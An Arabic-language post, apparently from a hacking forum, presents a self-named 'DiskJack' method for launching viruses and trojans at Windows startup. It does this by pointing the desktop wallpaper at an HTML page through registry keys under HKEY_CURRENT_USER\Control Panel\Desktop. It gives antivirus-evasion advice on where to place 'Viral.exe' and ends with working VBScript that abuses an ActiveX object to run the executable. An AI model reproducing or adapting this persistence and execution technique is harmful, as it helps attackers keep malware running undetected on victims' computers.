السلام عليكم ورحمة الله تعالى وبركاته. اليوم سنتحدث عن طريقة جديدة إكتشفتها فقي نظام الوندوز لشتغيل البرمج الضارة و الفيروسات و التروجانات عند بدء التشغيل ما سنتكلم عنه هو ما الهدف من ولقد سميت هذه الطريقة البسيطة بــ DiskJack لكي تأخذ الطابع التقني . هذه الطريقة ولما تعتبر احسن من الطرق الأخرى. ما يعيب الطرق الأخرى هي انها مكشوفة وروتينة لذلك لابد من البحث عن طريقة غير مكشوفة وتكون بشكل مغاير. الطريقة تعتمد على خلفية سطح المكتب + التعديل في مسجل النظام لتغيرها(هنالك اكواد تقوم بذلك مباشرة). شاهد هذه الصورة وذلك بعد إقتناص و التأشير على خلفية سطح المكتب. ماذا تلاحظ؟؟؟ هل تعني لك هته العبارة شيء Internet Explorer_Server... اذا لم تعني لك شيئ شاهد الصورة ماذا تستنتج؟ اعرف اني وضعتك في دائرة من التساؤلات وانك لم تفهم شيئ لاعليك سأوضح. Internet Explorer_Server هو Class يستعمل في كثير من الحالات وتراه كثيرا في IE جميع الإصدارات لأنه هو الذي يقوم بعرض صفحات الإنترنت. وهذا يعني انك تستطيع ان تجعل خلفية ستطح المكتب عبارة عن ملف HTML لأنه هو المستعمل في عرض الصور في الخلفية(وهذا ما توضحه الصورة الأولى)، وهنا المشكلة. السيناريو سيكون كاتالي: 2-نسخ Viral.exe إلى مكان معين غير System Files Directory لكي لا يتم كشفها طبقا لتقنية behavior Study طبعا هذه إجراءات إحترازية ضد الكاسبر 2009 ممكن سيكون من السهل نسخ الفيروس إلى مجلد النظام وعدم التعرض للكشف من برامج المكافحة الأخرى. 1-انشاء صفحة HTML بها كود يقوم بتشغيل Viral.exe 3-تغير الخلفية إلى صفحة ال HTML التي تم إنشاءها. وذلك عن طريق التعديل على المفتاح التالي في Registry.
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Control Panel\Desktop\WallpaperStyle
<script language=vbscript>on error resume nextdim sysSet df = document.createElement("object")df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "set fso = df.createobject("Scripting.FileSystemObject","")set s=df.CreateObject("Shell.Application.1","")set re=df.createobject("wscript.shell","")sys=fso.GetSpecialFolder(1)s.Open ("C:\Program Files\WinRAR\Viral.exe")</script>